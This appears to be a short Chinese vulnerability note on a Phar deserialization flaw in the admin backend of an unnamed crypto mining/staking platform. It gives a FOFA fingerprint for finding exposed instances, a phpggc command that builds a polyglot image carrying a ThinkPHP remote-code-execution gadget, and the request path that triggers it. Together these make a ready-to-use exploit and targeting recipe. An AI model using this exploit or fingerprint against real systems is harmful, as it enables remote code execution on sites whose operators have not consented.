跳到主要内容

某U挖矿质押单语言系统后台phar反序列漏洞

位于 /admin/controller/Cache.php 控制器的 deldir 方法存在file_exists 函数,该函数可以直接导致Phar反序列化漏洞触发

fofa

"/static/index/css/login/framework7.ios.min.css"

poc

首先我们需要用phpggc生成一个绕过图片检测的phar反序列化脚本,用一张正常图片即可

./phpggc -pj 123.jpg -o evil.jpg ThinkPHP/RCE2 system whoami
/admin/cache/deldir?backup_file=phar://图片地址

图片